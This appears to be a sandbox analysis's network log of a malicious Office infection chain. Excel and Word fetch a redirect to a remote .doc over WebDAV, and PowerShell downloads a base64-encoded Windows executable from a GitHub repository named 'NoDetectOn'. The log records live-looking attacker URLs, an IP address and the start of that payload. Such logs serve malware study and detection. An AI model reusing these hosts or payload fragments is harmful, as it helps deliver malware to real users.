                                                                                                                                                                                      Oct 7, 2024 07:15:00.134396076 CEST1236INData Raw: 5a 55 49 75 35 5a 74 6b 7a 45 65 4a 59 55 6d 6c 4c 4a 4c 34 59 6d 53 64 49 77 6f 6c 74 55 7a 43 48 39 33 7a 36 55 59 69 4f 5a 45 36 4d 45 57 72 37 56 55 4c 4e 6d 45 33 6c 38 6b 41 33 61 4f 42 4f 62 63 75 6b 34 6f 43 78 51 4c 4f 56 59 62 36 6f 31
                                                                                                                                                                                      Data Ascii: ZUIu5ZtkzEeJYUmlLJL4YmSdIwoltUzCH93z6UYiOZE6MEWr7VULNmE3l8kA3aOBObcuk4oCxQLOVYb6o1pIY34R0zElulxcfEr3NWIvvygu8wVLAaUDQbvoyXQ/PQA6T2M25yUoCaUsQIWZYDmWDKo0tKFboAUYF/gFTrzPiOdOVLKbFGoT+jJSGEp7o2IIVZlNCBO3BSPQxgAspoBTPuhPKwIz8fdRDpHQROFEByiPKgoAZnG
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134429932 CEST1236INData Raw: 4d 58 74 35 47 38 77 5a 79 61 6b 4d 35 46 65 76 4a 74 52 49 72 5a 74 6f 56 61 75 6e 74 49 53 57 64 30 4e 63 42 66 68 57 44 6b 6e 32 43 75 6a 70 61 37 38 4d 68 74 39 7a 4c 4b 69 38 7a 75 65 6b 45 30 57 7a 6b 63 35 34 68 36 63 4b 52 69 55 4f 41 76
                                                                                                                                                                                      Data Ascii: MXt5G8wZyakM5FevJtRIrZtoVauntISWd0NcBfhWDkn2Cujpa78Mht9zLKi8zuekE0Wzkc54h6cKRiUOAvtImovJQWp832AYyHH3dpB0mtxwqfZDgS3uvukhyKMrNysuUBGjMJqHe4aS+ItCafbThlU+8ohTnJCJIFzkJ/nntqYmDmH4OQv4W00/5Z8IQNpYQ0H1TsF4BRu0PKIR4M9vSLb4JwzSvCwMmUc62iUisUIfrQK9fdb
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134463072 CEST1236INData Raw: 36 44 79 57 52 6a 6c 6b 4f 78 6a 2f 4e 72 64 38 30 61 6a 62 65 32 77 64 72 54 65 69 30 7a 65 54 6b 54 66 7a 32 32 6f 68 38 41 65 56 35 4d 78 62 31 64 69 65 54 4c 2b 4d 4f 6f 61 5a 7a 4a 4f 4e 76 64 64 4d 6c 4d 73 62 79 71 4d 2f 72 4c 2b 41 50 58
                                                                                                                                                                                      Data Ascii: 6DyWRjlkOxj/Nrd80ajbe2wdrTei0zeTkTfz22oh8AeV5Mxb1dieTL+MOoaZzJONvddMlMsbyqM/rL+APXvnF3Tiu3zTC9Rp5VmsL7WuO9jOm7SPoKJRig1VxbrID5YsNI4HqwryqXPAchm2wcj2hu0on5zG7L1Yy/WeINbwZ87Rd4TuaUSQH91pO0fusYVgW4Qm5VwuVQv6S9Kvws9Q8w5cLeSZRVAYuDnl4W3cq/9VZHjY80l
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134500027 CEST1236INData Raw: 30 30 55 79 59 63 51 50 49 61 58 55 48 73 66 47 6c 42 7a 4a 31 64 67 34 39 54 4e 53 76 4a 75 46 54 41 79 48 6d 48 6a 4e 73 74 4f 42 30 49 58 48 6e 76 6a 35 2b 53 53 6e 38 43 64 65 6d 50 35 75 59 75 62 31 57 73 46 43 34 57 51 39 2f 7a 62 6c 73 4b
                                                                                                                                                                                      Data Ascii: 00UyYcQPIaXUHsfGlBzJ1dg49TNSvJuFTAyHmHjNstOB0IXHnvj5+SSn8CdemP5uYub1WsFC4WQ9/zblsKO6tJMXYlexmZeZO6F6jMHfpokIpU4DMrbwqR0ghDq74re73pELRcHj3Av7O0M951V3sbFp29z0Jl7U4qFjcbTSf8iywCjsOU0ZwChFLzDsofk/M/Nz3++kPyrw7x8iJenXFzxc28gZ+Ih/M/2xZkY+FKcZYbF1JpK
                                                                                                                                                                                      Oct 7, 2024 07:15:00.139509916 CEST1236INData Raw: 37 43 78 4e 70 6a 36 64 5a 73 62 47 4f 56 65 37 72 31 37 4f 6e 78 56 4e 30 74 77 58 64 33 49 54 2b 63 38 6d 36 59 71 2f 55 74 2f 4f 6a 41 76 71 55 54 70 46 6c 33 62 53 74 72 47 6f 76 76 71 6c 75 37 2b 66 49 74 4a 76 4b 65 37 55 33 55 58 72 6e 4f
                                                                                                                                                                                      Data Ascii: 7CxNpj6dZsbGOVe7r17OnxVN0twXd3IT+c8m6Yq/Ut/OjAvqUTpFl3bStrGovvqlu7+fItJvKe7U3UXrnOxtqj/y8D8lSqyrcrSg44c536LWXIcNUWDTtuCDRUzg+5L2jpwIOpHM9jsZPa1skanrslY2yaR4v141OMzNb5uBW7pl9/vn23P7rrpr7358fP+B6X1ucby95Z/8cv/mz63/adq2oqftvaXrf71et0y/8rucSrxjiVD


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      0192.168.2.224916114.194.50.2114433524C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:31 UTC317OUTGET /a080 HTTP/1.1
                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                      Host: m2g.me
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2024-10-07 05:14:32 UTC394INHTTP/1.1 302 Found
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:31 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Location: http://38.240.41.28/333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc
                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      1192.168.2.224916314.194.50.2114433792C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:34 UTC128OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                      User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                                                                      Host: m2g.me
                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2024-10-07 05:14:35 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:35 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      2024-10-07 05:14:35 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                                      Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      2192.168.2.224916414.194.50.2114433792C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:36 UTC111OUTHEAD /a080 HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                      Host: m2g.me
                                                                                                                                                                                      2024-10-07 05:14:37 UTC375INHTTP/1.1 302 Found
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:37 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Location: http://38.240.41.28/333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                      3192.168.2.224916514.194.50.211443
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:41 UTC123OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                                                      translate: f
                                                                                                                                                                                      Host: m2g.me
                                                                                                                                                                                      2024-10-07 05:14:42 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:41 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      2024-10-07 05:14:42 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                                      Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                      4192.168.2.224916614.194.50.211443
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:43 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                                      2024-10-07 05:14:44 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:43 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      2024-10-07 05:14:44 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                                      Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                                      2024-10-07 05:14:44 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 35 2c 36 39 30 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                      Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 35,690 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                                      2024-10-07 05:14:44 UTC2INData Raw: 0d 0a
                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                      2024-10-07 05:14:44 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                      Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                      5192.168.2.224916714.194.50.211443
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:45 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                                      2024-10-07 05:14:46 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:45 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      2024-10-07 05:14:46 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                                      Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                                      2024-10-07 05:14:46 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 35 2c 36 39 33 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                      Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 35,693 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                                      2024-10-07 05:14:46 UTC2INData Raw: 0d 0a
                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                      2024-10-07 05:14:46 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                      Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      6192.168.2.224916814.194.50.2114433792C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:47 UTC130OUTHEAD /a080 HTTP/1.1
                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                      Host: m2g.me
                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2024-10-07 05:14:48 UTC375INHTTP/1.1 302 Found
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:48 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Location: http://38.240.41.28/333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      7192.168.2.2249171185.199.108.1334431368C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:56 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2024-10-07 05:14:57 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 2935468
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                      ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: 4619:1531AA:B178E9:C23C97:67036E4F
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:56 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-ewr-kewr1740074-EWR
                                                                                                                                                                                      X-Cache: MISS
                                                                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                                                                      X-Timer: S1728278097.822085,VS0,VE171
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                      X-Fastly-Request-ID: c2cd070da65988bd6ca21757bc4d4b5286850ca0
                                                                                                                                                                                      Expires: Mon, 07 Oct 2024 05:19:56 GMT
                                                                                                                                                                                      Source-Age: 0
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                                                                      Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
